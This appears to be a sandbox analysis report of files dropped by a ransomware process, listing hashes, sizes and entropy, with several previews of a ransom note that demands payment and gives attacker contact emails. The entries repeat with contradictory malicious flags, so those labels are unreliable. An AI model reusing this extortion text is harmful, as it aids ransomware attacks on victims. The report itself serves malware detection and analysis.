                                                                                                    SHA1:D6D5E6C22B1D0068533B3592316E20A9B97B35B4
                                                                                                    SHA-256:FC5E62101D27F1B37D5473BC26B25E938188E110D9ABFE7A8399D387E1B50578
                                                                                                    SHA-512:AC0B5DE2162B4566A5FFDDC42E234A571FC29104D09FEBD89A05AEAB6C8775ADDE7E68230306B705B26E3128B290220A65C5640CDA7B856978CDCAFE0C57C12B
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36752
                                                                                                    Entropy (8bit):5.918460912846145
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3pWd/Yj1lay5LDep15GhiUxpY14cVn+mGvkN6z+CAaNoXzFS531nSrDadV:ey5LDC5GhiUY1PVJGvkNwNoXzFS5EI
                                                                                                    MD5:9BF67ED336497D6B9C827AD035D9090C
                                                                                                    SHA1:D6D5E6C22B1D0068533B3592316E20A9B97B35B4
                                                                                                    SHA-256:FC5E62101D27F1B37D5473BC26B25E938188E110D9ABFE7A8399D387E1B50578
                                                                                                    SHA-512:AC0B5DE2162B4566A5FFDDC42E234A571FC29104D09FEBD89A05AEAB6C8775ADDE7E68230306B705B26E3128B290220A65C5640CDA7B856978CDCAFE0C57C12B
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6992
                                                                                                    Entropy (8bit):7.429981359263057
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:G2cByEtfhbzYpZllrTjXFBmLYfmaBgxPnkWEDp/GgK8A6JYVhRsxdxprU64dGihw:ncQELGfj1pOPPnkWeLJA6unSrDadGiA7
                                                                                                    MD5:8A43B643FE58D1BB7EEBBD9CF9C59EA5
                                                                                                    SHA1:777774B692A5E3ABFE0C8426A4CEB75684C59F99
                                                                                                    SHA-256:8F0C5D3E4DEB05C2542688FC888E73D597B48878A178A222C6F16B5D12972B95
                                                                                                    SHA-512:927CFF9AF99B4A4AEA08B2FB69A9524B289DDD66115515C62032FA5C62B29A17046C004BF415EC064E68784F935B98A4D7EBB31228CECA469D1EFAE538427CF0
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6992
                                                                                                    Entropy (8bit):7.429981359263057
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:G2cByEtfhbzYpZllrTjXFBmLYfmaBgxPnkWEDp/GgK8A6JYVhRsxdxprU64dGihw:ncQELGfj1pOPPnkWeLJA6unSrDadGiA7
                                                                                                    MD5:8A43B643FE58D1BB7EEBBD9CF9C59EA5
                                                                                                    SHA1:777774B692A5E3ABFE0C8426A4CEB75684C59F99
                                                                                                    SHA-256:8F0C5D3E4DEB05C2542688FC888E73D597B48878A178A222C6F16B5D12972B95
                                                                                                    SHA-512:927CFF9AF99B4A4AEA08B2FB69A9524B289DDD66115515C62032FA5C62B29A17046C004BF415EC064E68784F935B98A4D7EBB31228CECA469D1EFAE538427CF0
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9283
                                                                                                    Entropy (8bit):7.060870265651313
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:En/7dcy2vkjO0xIJWs+n7tn9JA6unSrDtTZdmS8F:e/7XEFWG1nSrDhZdmjF
                                                                                                    MD5:20103C34EC1A15207C387524E06C248A
                                                                                                    SHA1:2F130C30367B38114B3A8B666166BD7F84FC1C50
                                                                                                    SHA-256:303A6DD3D6CEF0A2FFD9D4048CB262514D5C1669401C7124068D2E9D2FA9DC6C
                                                                                                    SHA-512:AE5022CAD0E7AE77AC3CE41DF5A042A3713309C37DF14871A2D647AFD376220502C2E08120209BA42F0729AC625EBDDC0E51FFC58B4C9262EBB73F7D48CFD15D
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9283
                                                                                                    Entropy (8bit):7.060870265651313
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:En/7dcy2vkjO0xIJWs+n7tn9JA6unSrDtTZdmS8F:e/7XEFWG1nSrDhZdmjF
                                                                                                    MD5:20103C34EC1A15207C387524E06C248A
                                                                                                    SHA1:2F130C30367B38114B3A8B666166BD7F84FC1C50
                                                                                                    SHA-256:303A6DD3D6CEF0A2FFD9D4048CB262514D5C1669401C7124068D2E9D2FA9DC6C
                                                                                                    SHA-512:AE5022CAD0E7AE77AC3CE41DF5A042A3713309C37DF14871A2D647AFD376220502C2E08120209BA42F0729AC625EBDDC0E51FFC58B4C9262EBB73F7D48CFD15D
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:SysEx File -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6999
                                                                                                    Entropy (8bit):7.43820696343051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:0H809EdGKg8mCDkr9eKtJA6unSrDadKXJ:P09EdGQlkr9eV1nSrDadKXJ
                                                                                                    MD5:DFF56CD921ED473973A60405795C1351
                                                                                                    SHA1:72EE16CA99DB3B43D2455C39C20D4DDB19345681
                                                                                                    SHA-256:A7AC98E5F86D4D6220F942DEDAB1941B20153E24662CA8224A27683D43446106
                                                                                                    SHA-512:24DA027659E5F42A67F6127123C5ADD9FFA0231FB5CE9D275A2EAE41C24735FA548DB9DB14A6CF2FA64C49A1E533B76EB5F4CAEF8001F2FD346C9F32B0919F79
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:SysEx File -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6999
                                                                                                    Entropy (8bit):7.43820696343051
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:0H809EdGKg8mCDkr9eKtJA6unSrDadKXJ:P09EdGQlkr9eV1nSrDadKXJ
                                                                                                    MD5:DFF56CD921ED473973A60405795C1351
                                                                                                    SHA1:72EE16CA99DB3B43D2455C39C20D4DDB19345681
                                                                                                    SHA-256:A7AC98E5F86D4D6220F942DEDAB1941B20153E24662CA8224A27683D43446106
                                                                                                    SHA-512:24DA027659E5F42A67F6127123C5ADD9FFA0231FB5CE9D275A2EAE41C24735FA548DB9DB14A6CF2FA64C49A1E533B76EB5F4CAEF8001F2FD346C9F32B0919F79
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):758
                                                                                                    Entropy (8bit):7.726274664717319
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:H5FZ5Yw01BQ3MAZLyvT7sfsUh80uhKSFoWolZYj2JEjuGo30u64GMW/VH/lvuacx:HD/MAZLS3eLh80uYCoWEZjJ/fRGMW9FU
                                                                                                    MD5:805169A2D557E93A085830416DFD8C3D
                                                                                                    SHA1:20CE6D2840FBBFF8867A9DE5E288D1D7E839782F
                                                                                                    SHA-256:F5B225B8D3F23467E58A9211FAB212663320D7E1692170C0C9A459CA6842282E
                                                                                                    SHA-512:5B3F8E10DF1F8FE237B732B993A89A0945814274CC3B35B3A97EBA1D6FF4F024D687E60CCC57D1C8716A7F36E86E9B6F6277A3B5132BC50D2F029BBA60E75103
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):758
                                                                                                    Entropy (8bit):7.726274664717319
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:H5FZ5Yw01BQ3MAZLyvT7sfsUh80uhKSFoWolZYj2JEjuGo30u64GMW/VH/lvuacx:HD/MAZLS3eLh80uYCoWEZjJ/fRGMW9FU
                                                                                                    MD5:805169A2D557E93A085830416DFD8C3D
                                                                                                    SHA1:20CE6D2840FBBFF8867A9DE5E288D1D7E839782F
                                                                                                    SHA-256:F5B225B8D3F23467E58A9211FAB212663320D7E1692170C0C9A459CA6842282E
                                                                                                    SHA-512:5B3F8E10DF1F8FE237B732B993A89A0945814274CC3B35B3A97EBA1D6FF4F024D687E60CCC57D1C8716A7F36E86E9B6F6277A3B5132BC50D2F029BBA60E75103
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):757
                                                                                                    Entropy (8bit):7.725275505602055
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:4ckzAWOjrJForN8ANFNwuF5MMHeAYJADYJmxbkTU4d21dJfPyZ9o79EvFBdrNmn:+zA1jr0rNvwuDps+bkob3JfKiEtbE
                                                                                                    MD5:AF6162C20CF365A94320FD9C8189E35B
                                                                                                    SHA1:30232BE336EC465588F905031D3A0C2B31F4B4F3
                                                                                                    SHA-256:46D4E3C9D35383D82C786BD240B706DFDFDA22F5FE1AB4DA64D06CA5093F6DAC
                                                                                                    SHA-512:BA00C350587B40F9CEC3242AA108F83553037A4A1222268412C7797F8D6803C70703FB5A74840B318FF33A2E02FD947638AD6B6A21057367F8F20D901AC4D570
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):757
                                                                                                    Entropy (8bit):7.725275505602055
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:4ckzAWOjrJForN8ANFNwuF5MMHeAYJADYJmxbkTU4d21dJfPyZ9o79EvFBdrNmn:+zA1jr0rNvwuDps+bkob3JfKiEtbE
                                                                                                    MD5:AF6162C20CF365A94320FD9C8189E35B
                                                                                                    SHA1:30232BE336EC465588F905031D3A0C2B31F4B4F3
                                                                                                    SHA-256:46D4E3C9D35383D82C786BD240B706DFDFDA22F5FE1AB4DA64D06CA5093F6DAC
                                                                                                    SHA-512:BA00C350587B40F9CEC3242AA108F83553037A4A1222268412C7797F8D6803C70703FB5A74840B318FF33A2E02FD947638AD6B6A21057367F8F20D901AC4D570
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):42144
                                                                                                    Entropy (8bit):5.843513201571849
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:qq0flSkqI82dbymcY0XLQ3gJ6qMkwNoXzFS5a0z:qq1pIxs7X36qMkwNoXzFS5x
                                                                                                    MD5:28DC25ED62CBA622624B3A3A751F8283
                                                                                                    SHA1:0351EE2FE610F4F4F410D533171415F1D5CB5204
                                                                                                    SHA-256:BCD9ED03003620B66B8CB4FB01D4927E3AEA9AAF6AFF49C448037A8A0FEB32F4
                                                                                                    SHA-512:B6EE2D4DE36B795926F7839E78ACD9914C063213329C0A3A24C4906E77941D0E691860DC3EC3C5CA3352E1E4BF40705094116304160176B68C740A7C5984E8C2
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):42144
                                                                                                    Entropy (8bit):5.843513201571849
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:qq0flSkqI82dbymcY0XLQ3gJ6qMkwNoXzFS5a0z:qq1pIxs7X36qMkwNoXzFS5x
                                                                                                    MD5:28DC25ED62CBA622624B3A3A751F8283
                                                                                                    SHA1:0351EE2FE610F4F4F410D533171415F1D5CB5204
                                                                                                    SHA-256:BCD9ED03003620B66B8CB4FB01D4927E3AEA9AAF6AFF49C448037A8A0FEB32F4
                                                                                                    SHA-512:B6EE2D4DE36B795926F7839E78ACD9914C063213329C0A3A24C4906E77941D0E691860DC3EC3C5CA3352E1E4BF40705094116304160176B68C740A7C5984E8C2
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):615
                                                                                                    Entropy (8bit):7.660432283916497
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:RFgKlaJbiATmN/i0L7WdBfVmHthp8oIJtYudY8JWlLNli+uUHn:X7lavTyqHdBfVmHTp8oIJyudY8ElBli2
                                                                                                    MD5:828FB5E46F5DEA34CE1ACC26EF05DAC7
                                                                                                    SHA1:B4BC0311AF2D1D530651745F36E65196B2F3B563
                                                                                                    SHA-256:290B90363D561D86B54C32E96B26E7491FA12C25F42FBC5DD4F29606BC4922AB
                                                                                                    SHA-512:FBDBB13663F8846C756AFEBAE368DC8D3AA65E65B306C9AB961B9B17DFFCFCEB11345CFF81310CCA2CCF1FCBD1937113CED776807F3C2DBBD0D98804BF30C281
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):615
                                                                                                    Entropy (8bit):7.660432283916497
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:RFgKlaJbiATmN/i0L7WdBfVmHthp8oIJtYudY8JWlLNli+uUHn:X7lavTyqHdBfVmHTp8oIJyudY8ElBli2
                                                                                                    MD5:828FB5E46F5DEA34CE1ACC26EF05DAC7
                                                                                                    SHA1:B4BC0311AF2D1D530651745F36E65196B2F3B563
                                                                                                    SHA-256:290B90363D561D86B54C32E96B26E7491FA12C25F42FBC5DD4F29606BC4922AB
                                                                                                    SHA-512:FBDBB13663F8846C756AFEBAE368DC8D3AA65E65B306C9AB961B9B17DFFCFCEB11345CFF81310CCA2CCF1FCBD1937113CED776807F3C2DBBD0D98804BF30C281
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):554
                                                                                                    Entropy (8bit):7.644033544573608
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:/1WuVcfUxkRGCc9g+KzCSVCeQTH64q1AM5gywOn:/NeGj9N/SV7Ss1AM5gY
                                                                                                    MD5:E2D059C957F329F95D87A111327F3AA2
                                                                                                    SHA1:B79438F366426818FD725ABAF7D8761F95D3823D
                                                                                                    SHA-256:194EBF881EE8E01017A5E105C5194D85FCA004F823E639BE54890E3B50054B42
                                                                                                    SHA-512:373C674E45BDC983AAE8615BCB1BE454ED9F4A47B15F9788753028F81AEE737D54ECAF613FF03F7D380C9E2903CB39DA9C35839044AC738F1230F0321BB07F03
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):554
                                                                                                    Entropy (8bit):7.644033544573608
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:/1WuVcfUxkRGCc9g+KzCSVCeQTH64q1AM5gywOn:/NeGj9N/SV7Ss1AM5gY
                                                                                                    MD5:E2D059C957F329F95D87A111327F3AA2
                                                                                                    SHA1:B79438F366426818FD725ABAF7D8761F95D3823D
                                                                                                    SHA-256:194EBF881EE8E01017A5E105C5194D85FCA004F823E639BE54890E3B50054B42
                                                                                                    SHA-512:373C674E45BDC983AAE8615BCB1BE454ED9F4A47B15F9788753028F81AEE737D54ECAF613FF03F7D380C9E2903CB39DA9C35839044AC738F1230F0321BB07F03
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1568
                                                                                                    Entropy (8bit):7.872483056812492
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:l9W10mMvy373TndMob+uNfeuPWqSr3rb8wIjgCUIhi0rX1RSTxcZq6OgnIHH:v7pS7jJuuPWbbhIjN80rXyVwOSyH
                                                                                                    MD5:29588A90C97E6E3241980F9CDD5F5399
                                                                                                    SHA1:1C0771F169DDB2D26E768321DDBDE4D3CD4AA389
                                                                                                    SHA-256:BCE042BC5B519C1FC4B3C8E73F7AC2D672A5611D6ECDF32FD671B892DD966AB7
                                                                                                    SHA-512:0A9DD66C615134971F7F02380398D5A2464497B4B14696396BCB6370D821A03E38883AA657C865D1D93E4AA2CEE22D47F45CE3852AF4C1F9E62CDF363D586438
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1568
                                                                                                    Entropy (8bit):7.872483056812492
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:l9W10mMvy373TndMob+uNfeuPWqSr3rb8wIjgCUIhi0rX1RSTxcZq6OgnIHH:v7pS7jJuuPWbbhIjN80rXyVwOSyH
                                                                                                    MD5:29588A90C97E6E3241980F9CDD5F5399
                                                                                                    SHA1:1C0771F169DDB2D26E768321DDBDE4D3CD4AA389
                                                                                                    SHA-256:BCE042BC5B519C1FC4B3C8E73F7AC2D672A5611D6ECDF32FD671B892DD966AB7
                                                                                                    SHA-512:0A9DD66C615134971F7F02380398D5A2464497B4B14696396BCB6370D821A03E38883AA657C865D1D93E4AA2CEE22D47F45CE3852AF4C1F9E62CDF363D586438
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1568
                                                                                                    Entropy (8bit):7.874544721661754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9774V6DnY4a4CnzL3+KvyldqiOmeUkEI7aXCHWLv:JACYCCnzL7IOmTkvqCov
                                                                                                    MD5:20D9186AC7957403717C75EC690AE2B0
                                                                                                    SHA1:D78EDE450080CB6DDA77906ECE8FDB15424D793D
                                                                                                    SHA-256:295EA984CC1F553AC1637683693502EF25428BC4B75564C0FB7D14CA620FCD16
                                                                                                    SHA-512:14860F837B9F642CE75F2EEEA1671C2A2CF932E17D8E613B9BC7A64D0D1C45D21AD006D0B9D26C3E59731724EB37993D063B3DF42E62ACB14FC7384693E35912
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1568
                                                                                                    Entropy (8bit):7.874544721661754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9774V6DnY4a4CnzL3+KvyldqiOmeUkEI7aXCHWLv:JACYCCnzL7IOmTkvqCov
                                                                                                    MD5:20D9186AC7957403717C75EC690AE2B0
                                                                                                    SHA1:D78EDE450080CB6DDA77906ECE8FDB15424D793D
                                                                                                    SHA-256:295EA984CC1F553AC1637683693502EF25428BC4B75564C0FB7D14CA620FCD16
                                                                                                    SHA-512:14860F837B9F642CE75F2EEEA1671C2A2CF932E17D8E613B9BC7A64D0D1C45D21AD006D0B9D26C3E59731724EB37993D063B3DF42E62ACB14FC7384693E35912
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1483
                                                                                                    Entropy (8bit):7.8573670342775825
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:uWjaX9Ftw4DunCAfARNt9JK1sCHSe/1Y9Gp5gpSjoy55E8JTtEIWpInN6zDps:natFC4BFT9Jq7SeNY9G7jjo63JZ4zDm
                                                                                                    MD5:499BC82C97D2D091BA29E1474714E09D
                                                                                                    SHA1:DEA8CC778CEF2392010FB7BFB11A6C6F869D1F32
                                                                                                    SHA-256:C2D926175B2DE2A918E68214A98736EC19DB151450A6B3DABDA424C7E29A6232
                                                                                                    SHA-512:5E63D10DB4FD95DBA06A6588D69ECC8C377B339C6876DA595B05FC909ECBC3D9E5FC99173FA99C3E9DC6F7DB3CB03B64BA711F1EB1CDAC6A574F111FA3A223DB
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1483
                                                                                                    Entropy (8bit):7.8573670342775825
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:uWjaX9Ftw4DunCAfARNt9JK1sCHSe/1Y9Gp5gpSjoy55E8JTtEIWpInN6zDps:natFC4BFT9Jq7SeNY9G7jjo63JZ4zDm
                                                                                                    MD5:499BC82C97D2D091BA29E1474714E09D
                                                                                                    SHA1:DEA8CC778CEF2392010FB7BFB11A6C6F869D1F32
                                                                                                    SHA-256:C2D926175B2DE2A918E68214A98736EC19DB151450A6B3DABDA424C7E29A6232
                                                                                                    SHA-512:5E63D10DB4FD95DBA06A6588D69ECC8C377B339C6876DA595B05FC909ECBC3D9E5FC99173FA99C3E9DC6F7DB3CB03B64BA711F1EB1CDAC6A574F111FA3A223DB
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):284
                                                                                                    Entropy (8bit):7.209353040299389
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:zx9RBPm04doCBafqYPbRsMoFIJrWB4ujFLIGuUwn:zRBPgq2YzFYurWBLwn
                                                                                                    MD5:6923B56D3E94E4753CDA67E7040FC67B
                                                                                                    SHA1:47A410D1483D9CE82A630F061B45751F86815193
                                                                                                    SHA-256:D6B7FE6130F60745A95E33150BE9A864F48EB318F769545BA3A0F53A69BE40EC
                                                                                                    SHA-512:26D1DADE51F646A6656DB88324A6507542655BD2D8ECEBBB1080B985866CFF654ACACEF2D5EA5EC70ACD543B63758733891821EE90AFC2261F668A8D4CAC9679
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):284
                                                                                                    Entropy (8bit):7.209353040299389
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:zx9RBPm04doCBafqYPbRsMoFIJrWB4ujFLIGuUwn:zRBPgq2YzFYurWBLwn
                                                                                                    MD5:6923B56D3E94E4753CDA67E7040FC67B
                                                                                                    SHA1:47A410D1483D9CE82A630F061B45751F86815193
                                                                                                    SHA-256:D6B7FE6130F60745A95E33150BE9A864F48EB318F769545BA3A0F53A69BE40EC
                                                                                                    SHA-512:26D1DADE51F646A6656DB88324A6507542655BD2D8ECEBBB1080B985866CFF654ACACEF2D5EA5EC70ACD543B63758733891821EE90AFC2261F668A8D4CAC9679
                                                                                                    Malicious:false
                                                                                                    Preview:.N..e.....^\..}}2^+.*.PI=7.f....N8.0........a.hc....@l...l.N._b...n{.WxM..Z.j....H..... <..N^.em...-TA..+....P.(....r..y[(.]*&_...5...0>..<..`..U....14...[..2.-.d. #...)....U.|b.0.u<(I.tS.~-@V..0@S..yw..ZU.B?...K\..........6.#C.ozt*D.z.l.....~.B........3t...\.k0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4362
                                                                                                    Entropy (8bit):7.956480722807559
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:LFfPom4rW8la5DGXaqMrLCpv5SOuNxo703McmQ2DEuqCG4:LJQpflMtwxSOC+mMcolVh
                                                                                                    MD5:4BEA384FAD324F11E1C9646E95631EDA
                                                                                                    SHA1:9B25D606EF1B75AB71021216542C89077481929E
                                                                                                    SHA-256:FEB95E45C104941546A069932CB1D1B78E99A624376890D207FFED2C53995568
                                                                                                    SHA-512:F3A0F603623F60FF91996B3B4CCD5F839FF9EFB9A82601B5503EB3E074D6D157A71BFF90C3CCA57D25DEEC02819506381212F91A077BB4623CE92A122FE7AAFA
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4362
